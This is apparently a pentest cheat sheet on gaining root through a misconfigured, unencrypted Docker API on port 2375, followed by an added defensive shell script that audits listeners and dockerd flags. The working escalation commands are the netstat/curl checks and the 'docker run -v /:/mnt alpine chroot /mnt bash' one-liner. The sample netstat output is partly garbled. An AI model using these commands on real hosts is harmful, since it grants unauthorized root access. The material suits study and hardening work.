Docker - Escalation of privilege - Misconfigured Docker Socket

  • Escalation

List all processes listening on TCP ports

netstat -tlp
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 localhost:2375*               LISTEN      -                   
tcp        0      0   *               LISTEN      -                   
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -           


  • Port 2375: Docker API unencrypted
  • Port 2376: Docker API encrypted


Check whether the service listening on port 2375 is the Docker API:

curl localhost:2375/version
{"Platform":{"Name":"Docker Engine - Community"},

The Docker client is installed on the machine, and the API is exposed on the default port 2375. Configure the Docker client to reach it over TCP:


export DOCKER_HOST="tcp://localhost:2375"


Start a container and mount the host's root filesystem on a directory inside it. The alpine image ships sh, not bash, so sh is the shell to start here:

docker run -it -v /:/mnt alpine sh

Once inside the container:


chroot /mnt bash


In one line:

docker run -it --rm -v /:/mnt alpine chroot /mnt bash
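
To check a host for the exposure this escalation relies on, the following added example (not part of the original page) classifies listeners on the Docker API ports and checks a dockerd command line for a tcp:// host without --tlsverify. The function names, the `ss -H -tln` input layout and the sample lines are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a host for the exposed Docker API described above.
# All sample input below is constructed for illustration.

# classify_listener ADDR:PORT -> one finding line for Docker API ports
classify_listener() {
    addr=${1%:*}; port=${1##*:}
    case "$port" in
        2375) ;;                                   # plaintext API
        2376) echo "INFO $1 TLS port, verify --tlsverify"; return 0 ;;
        *)    return 0 ;;                          # not a Docker API port
    esac
    case "$addr" in
        127.*|localhost|"[::1]") echo "HIGH $1 plaintext API on loopback" ;;
        *)                       echo "CRITICAL $1 plaintext API on network" ;;
    esac
}

# audit_listeners: reads `ss -H -tln` style lines on stdin. The first field
# ending in :<digits> is the local address (the peer column ends in :*).
audit_listeners() {
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /:[0-9]+$/) { print $i; break } }' |
    while read -r laddr; do classify_listener "$laddr"; done
}

# audit_dockerd_args CMDLINE: a tcp:// host needs --tlsverify (client certs)
audit_dockerd_args() {
    case " $1 " in
        *tcp://*) ;;
        *) echo "OK no TCP listener"; return 0 ;;
    esac
    case " $1 " in
        *" --tlsverify "*|*" --tlsverify=true "*) echo "OK TCP listener requires client certs" ;;
        *) echo "HIGH TCP listener without --tlsverify" ;;
    esac
}

# Constructed sample data: listener table and a dockerd command line
SAMPLE_SS='LISTEN 0 4096 127.0.0.1:2375 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 *:2375 *:*
LISTEN 0 128 [::]:22 [::]:*'
SAMPLE_CMD='/usr/bin/dockerd -H unix:///var/run/docker.sock -H tcp://127.0.0.1:2375'

printf '%s\n' "$SAMPLE_SS" | audit_listeners
audit_dockerd_args "$SAMPLE_CMD"
```

A loopback-only listener is still rated HIGH because, as the steps above show, any local user who can reach the port can mount the host's root filesystem.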